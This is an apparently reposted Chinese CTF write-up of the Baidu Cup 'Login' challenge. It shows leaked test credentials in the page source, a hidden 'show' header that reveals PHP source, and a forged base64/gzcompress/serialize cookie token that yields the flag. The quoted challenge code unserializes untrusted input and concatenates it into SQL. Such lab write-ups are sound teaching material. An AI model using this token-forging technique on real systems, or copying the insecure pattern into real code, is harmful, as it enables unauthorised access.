“百度杯”CTF比赛 十月场 -------Login

其他 2018-08-05 23:42:11 阅读次数: 0

=============================================================

个人收获:

1.多观察网页的源代码

2.多留意http的访问信息

3.多留意http头参数的变化

4.收获了unserialize,gzuncompress参数的认识

===============================================================

题目界面

第一反应是通过burp抓包然后放到sqlmap里面去跑看看有什么有用的信息

自己手测发现页面只会跳出一个error并没有什么有用的信息

然后右键查看源码发现 test1,test1

题主还特地放在很下面 需要滚下去才能看到

然后用test1 test1成功登陆但是页面显示这个

看到这个第一反应就是看源代码然而并没有什么发现,然后通过burp抓包发现在http头里面有一个特别的参数show

这个参数挺可疑的,尝试把show:0(注意英文字符,冒号后面有一个空格)放到请求包里面测试下发现结果还是一样

但是换成了show:1就出现惊喜了

代码如下

<!-- <?php
include 'common.php';
$requset = array_merge($_GET, $_POST, $_SESSION, $_COOKIE);
class db
{
  public $where;
  function __wakeup()
  {
    if(!empty($this->where))
    {
      $this->select($this->where);
    }
  }
  function select($where)
  {
    $sql = mysql_query('select * from user where '.$where);
    return @mysql_fetch_array($sql);
  }
}
if(isset($requset['token']))
{
  $login = unserialize(gzuncompress(base64_decode($requset['token'])));
  $db = new db();
  $row = $db->select('user=\''.mysql_real_escape_string($login['user']).'\'');
  if($login['user'] === 'ichunqiu')
  {
    echo $flag;
  }else if($row['pass'] !== $login['pass']){
    echo 'unserialize injection!!';
  }else{
    echo "(╯‵□′)╯︵┴─┴ ";
  }
}else{
  header('Location: index.php?error=1');
}
?> -->

对他进行代码审计

发现这段

if($login['user'] === 'ichunqiu')
  {
    echo $flag;
  }else if($row['pass'] !== $login['pass']){
    echo 'unserialize injection!!';
  }else{
    echo "(╯‵□′)╯︵┴─┴ ";
  }
}else{
  header('Location: index.php?error=1');
}

那么login['user']从这段来

if(isset($requset['token']))
{
  $login = unserialize(gzuncompress(base64_decode($requset['token'])));
  $db = new db();
  $row = $db->select('user=\''.mysql_real_escape_string($login['user']).'\'');

我们可以发现requset中获取token值然后对它进行unserialize,gzuncompress,base64_decode等一系列操作得到login,

unserialize:对单一的已序列化的变量进行操作,将其转换回 PHP 的值

gzuncompress:解压被压缩的字符串

然后在login中获取键为user的值,如果等于ichunqiu就得出flag

那么我们只要对user:ichunqiu进行一系列逆操作就行

<?php
$a = array("user"=>'ichunqiu');
$a = base64_encode(gzcompress(serialize($a)));
echo $a

?>

得出

我们只要在Cookie中填入  token=eJxLtDK0qi62MrFSKi1OLVKyLraysFLKTM4ozSvMLFWyrgUAo4oKXA==;在发送过去就能获得flag

 注意token前面有个空格,结尾有个分号

猜你喜欢

转载自blog.csdn.net/nzjdsds/article/details/81348117
今日推荐
Arc Browser for Windows 1.0 正式 GA
90后程序员开发视频搬运软件、不到一年获利超 700 万,结局很刑!
《美国对全球网络空间安全与发展的威胁和破坏》报告发布
火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱?
北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”
周排行
rbac——界面、权限
Apache CXF + SpringMVC 整合发布WebService
so插件化
Vue.js实战系列---图标字体制作(svg格式)
PAT乙级 1007 素数对猜想(孪生素数对) (20分) ---(C语言 + 详细注释)
被IRM保护的文档,打开失败
Calendar和Date计算日期差的小问题
win10子系统ubuntu18.4安装docker
利用Wrap Shell Script定位Android Native内存泄漏
MySQL: Transaction (Part I - Basic Concept)
每日归档
更多
2024-05-03(19)
2024-05-02(0)
2024-05-01(4)
2024-04-30(1)
2024-04-29(40)
2024-04-28(0)
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022